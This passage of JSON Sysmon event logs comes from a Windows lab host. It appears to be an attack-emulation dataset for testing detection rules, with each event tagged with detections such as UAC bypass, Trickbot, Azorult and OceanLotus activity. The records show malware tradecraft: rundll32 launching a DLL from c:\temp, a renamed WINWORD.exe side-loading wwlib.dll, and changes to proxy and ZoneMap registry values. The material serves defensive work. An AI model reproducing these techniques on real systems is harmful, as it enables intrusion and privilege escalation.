21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424247,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:21.930441Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424248,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:21.931190Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD 
(0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424249,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:21.931290Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet","UtcTime":"2020-10-23 
21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424250,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:21.931385Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000000)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424251,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:21.931451Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary 
Data","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-3461203602-4096304019-2269080069-1000\\\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\rundll32.exe","UtcTime":"2020-10-23 21:58:22.063"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424260,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:22.063160Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51F9-5F93-0000-0010551E5E00","ProcessId":9116,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-3461203602-4096304019-2269080069-1000\\\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\rundll32.exe","UtcTime":"2020-10-23 
21:58:22.063"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424262,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:22.074619Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-3461203602-4096304019-2269080069-1000\\\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\rundll32.exe","UtcTime":"2020-10-23 21:58:22.360"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424320,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:22.361291Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-23 
21:35:19.617","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FE-5F93-0000-0010DC535E00","ProcessId":8920,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\data.enc","UtcTime":"2020-10-23 21:58:22.360"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":424322,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:22.364651Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-23 21:35:19.617","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FE-5F93-0000-0010DC535E00","ProcessId":8920,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\config.xml","UtcTime":"2020-10-23 21:58:22.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":424323,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:22.391794Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Trickbot Malware 
Activity"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\wermgr.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Problem Reporting","FileVersion":"10.0.17763.1369 (WinBuild.160101.0800)","Hashes":"SHA1=231052FA4311FA3501539E34E21A624921E3C270,MD5=CD042F94B63D67E012CFB4297D313248,SHA256=61A84B2D8CA05C11E79DB8E18FEB0FE4BE1B8D555D0BE2651516B144800153AB,IMPHASH=4E00FCA0721761B10A8A7351CEFB0596","Image":"C:\\Windows\\System32\\wermgr.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6311-5F8F-0000-0020E0100900","LogonId":"0x910e0","OriginalFileName":"WerMgr","ParentCommandLine":"rundll32.exe c:\\temp\\winfire.dll,DllRegisterServer","ParentImage":"C:\\Windows\\SysWOW64\\rundll32.exe","ParentProcessGuid":"747F3D96-659B-5F8F-0000-001026C33300","ParentProcessId":2372,"ProcessGuid":"747F3D96-659E-5F8F-0000-001064E03300","ProcessId":5600,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-20 22:33:02.059"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":422695,"Execution_attributes":{"ProcessID":3408,"ThreadID":4448},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-20T22:33:02.063979Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\Public\\tools\\apt\\wwlib\\","Description":"Microsoft Office 
Word","FileVersion":"12.0.4518.1014","Hashes":"SHA1=534A7EA9C67BAB3E8F2D41977BF43D41DFE951CF,MD5=CEAA5817A65E914AA178B28F12359A46,SHA256=6C959CFB001FBB900958441DFD8B262FB33E052342948BAB338775D3E83EF7F7,IMPHASH=46337557842A2A62735BB11EB096B204","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-CA8D-5F8A-0000-0020100A0A00","LogonId":"0xa0a10","OriginalFileName":"WinWord.exe","ParentCommandLine":"C:\\Windows\\Explorer.EXE","ParentImage":"C:\\Windows\\explorer.exe","ParentProcessGuid":"747F3D96-CA8F-5F8A-0000-001025020B00","ParentProcessId":5104,"ProcessGuid":"747F3D96-D8DF-5F8A-0000-0010572F7200","ProcessId":3660,"Product":"2007 Microsoft Office system","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-17 11:43:27.491"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":417068,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:27.499490Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network 
Connections"],"event":{"Event":{"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=6F32C711AFA423DF203AE2A27B259299402CF317,MD5=F0FCD453346038E434FA2D9F1E769F5B,SHA256=DB07BB76B9B227A54092179F4DCB3DFC25B325887E01098125AC44FDA70104E6,IMPHASH=22B6C0416D4E9B8FF922CC11DE30ADE7","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","ImageLoaded":"C:\\Users\\Public\\tools\\apt\\wwlib\\wwlib.dll","OriginalFileName":"?","ProcessGuid":"747F3D96-D8DF-5F8A-0000-0010572F7200","ProcessId":3660,"Product":"?","RuleName":"","Signature":"주식회사 엘리시온랩","SignatureStatus":"Valid","Signed":"true","UtcTime":"2020-10-17 11:43:27.769"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":417069,"Execution_attributes":{"ProcessID":3500,"ThreadID":4704},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:28.429353Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=6F32C711AFA423DF203AE2A27B259299402CF317,MD5=F0FCD453346038E434FA2D9F1E769F5B,SHA256=DB07BB76B9B227A54092179F4DCB3DFC25B325887E01098125AC44FDA70104E6,IMPHASH=22B6C0416D4E9B8FF922CC11DE30ADE7","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","ImageLoaded":"C:\\Users\\Public\\tools\\apt\\wwlib\\wwlib.dll","OriginalFileName":"?","ProcessGuid":"747F3D96-D8DF-5F8A-0000-0010572F7200","ProcessId":3660,"Product":"?","RuleName":"","Signature":"주식회사 엘리시온랩","SignatureStatus":"Valid","Signed":"true","UtcTime":"2020-10-17 
11:43:27.769"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":417070,"Execution_attributes":{"ProcessID":3500,"ThreadID":4704},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:28.429717Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft Office Word","FileVersion":"12.0.4518.1014","Hashes":"SHA1=534A7EA9C67BAB3E8F2D41977BF43D41DFE951CF,MD5=CEAA5817A65E914AA178B28F12359A46,SHA256=6C959CFB001FBB900958441DFD8B262FB33E052342948BAB338775D3E83EF7F7,IMPHASH=46337557842A2A62735BB11EB096B204","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-CA8D-5F8A-0000-0020D1090A00","LogonId":"0xa09d1","OriginalFileName":"WinWord.exe","ParentCommandLine":"C:\\Windows\\SysWOW64\\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}","ParentImage":"C:\\Windows\\SysWOW64\\dllhost.exe","ParentProcessGuid":"747F3D96-D8E2-5F8A-0000-0010F28A7200","ParentProcessId":8500,"ProcessGuid":"747F3D96-D8E3-5F8A-0000-001029A37200","ProcessId":1256,"Product":"2007 Microsoft Office system","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-17 
11:43:31.478"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":417071,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:31.484036Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=6F32C711AFA423DF203AE2A27B259299402CF317,MD5=F0FCD453346038E434FA2D9F1E769F5B,SHA256=DB07BB76B9B227A54092179F4DCB3DFC25B325887E01098125AC44FDA70104E6,IMPHASH=22B6C0416D4E9B8FF922CC11DE30ADE7","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","ImageLoaded":"C:\\Users\\Public\\tools\\apt\\wwlib\\wwlib.dll","OriginalFileName":"?","ProcessGuid":"747F3D96-D8E3-5F8A-0000-001029A37200","ProcessId":1256,"Product":"?","RuleName":"","Signature":"주식회사 엘리시온랩","SignatureStatus":"Valid","Signed":"true","UtcTime":"2020-10-17 11:43:31.615"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":417072,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:31.627786Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network 
Connections"],"event":{"Event":{"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=6F32C711AFA423DF203AE2A27B259299402CF317,MD5=F0FCD453346038E434FA2D9F1E769F5B,SHA256=DB07BB76B9B227A54092179F4DCB3DFC25B325887E01098125AC44FDA70104E6,IMPHASH=22B6C0416D4E9B8FF922CC11DE30ADE7","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","ImageLoaded":"C:\\Users\\Public\\tools\\apt\\wwlib\\wwlib.dll","OriginalFileName":"?","ProcessGuid":"747F3D96-D8E3-5F8A-0000-001029A37200","ProcessId":1256,"Product":"?","RuleName":"","Signature":"주식회사 엘리시온랩","SignatureStatus":"Valid","Signed":"true","UtcTime":"2020-10-17 11:43:31.615"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":417073,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:31.628328Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-17 10:48:12.936","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","ProcessGuid":"747F3D96-D8E3-5F8A-0000-001029A37200","ProcessId":1256,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe","UtcTime":"2020-10-17 
11:43:33.444"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":417074,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:33.449476Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-17 10:48:12.936","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","ProcessGuid":"747F3D96-D8E3-5F8A-0000-001029A37200","ProcessId":1256,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\wwlib.dll","UtcTime":"2020-10-17 11:43:33.444"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":417075,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:33.476471Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MS Office Product Spawning Exe in User Dir","Microsoft Office Product Spawning Windows 
Shell"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\AppData\\Roaming\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-CA8D-5F8A-0000-0020D1090A00","LogonId":"0xa09d1","OriginalFileName":"RUNDLL32.EXE","ParentCommandLine":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe --xStart","ParentImage":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe","ParentProcessGuid":"747F3D96-D8E5-5F8A-0000-0010E1BC7200","ParentProcessId":2920,"ProcessGuid":"747F3D96-D8E8-5F8A-0000-00102CEF7200","ProcessId":840,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-17 11:43:36.303"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":417079,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:36.306601Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MS Office Product Spawning Exe in User Dir"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\explorer.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\AppData\\Roaming\\","Description":"Windows Explorer","FileVersion":"10.0.17763.1369 
(WinBuild.160101.0800)","Hashes":"SHA1=60E3F357B06AF9EB84FB9019BF08FB4DD109D4EC,MD5=AA0CA518E66F290FE0BAC6169473E8A9,SHA256=0D7CB0B75CD61CDFFE0E53910829FFA5C02C8759EBD27A49E2EF7A907A10E506,IMPHASH=FBEBD61CE702929C1F33B522FD572C5D","Image":"C:\\Windows\\SysWOW64\\explorer.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-CA8D-5F8A-0000-0020D1090A00","LogonId":"0xa09d1","OriginalFileName":"EXPLORER.EXE","ParentCommandLine":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe --xStart","ParentImage":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe","ParentProcessGuid":"747F3D96-D8E5-5F8A-0000-0010E1BC7200","ParentProcessId":2920,"ProcessGuid":"747F3D96-D8EC-5F8A-0000-001094207300","ProcessId":6552,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-17 11:43:40.835"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":417081,"Execution_attributes":{"ProcessID":3500,"ThreadID":4688},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-17T11:43:40.902894Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","MS Office Product Spawning Exe in User Dir"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\AppData\\Roaming\\","Description":"Microsoft Office 
